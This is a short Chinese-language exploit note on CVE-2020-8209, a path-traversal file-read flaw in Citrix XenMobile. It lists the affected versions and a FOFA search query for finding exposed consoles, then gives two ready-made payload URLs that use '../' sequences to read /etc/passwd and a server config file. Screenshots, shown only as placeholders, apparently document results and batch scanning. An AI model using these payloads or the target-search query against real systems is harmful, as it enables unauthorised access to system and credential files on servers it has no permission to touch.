# CVE-2020-8209 XenMobile - 控制台 任意文件读取

# 漏洞简介

XenMobile 是 Citrix 开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。

Citrix Endpoint Management 存在 任意文件读取漏洞,远程未授权攻击者通过发送特制 HTTP 请求,可以造成读取受影响设备上任意文件的影响。

# 影响版本

  • XenMobile Server < 10.12 RP2
  • XenMobile Server < 10.11 RP4
  • XenMobile Server < 10.10 RP6
  • XenMobile Server < 10.9 RP5

# 资产查找

FOFA:

1
app="XenMobile-控制台"

国外站点较多

image-20210315141110375

image-20210315131808508

payload:

1
2
http://xxx.xxx.xxx.xxx/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
http://xxx.xxx.xxx.xxx/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties

image-20210315132111592

批量检测如下:

image-20210315140653682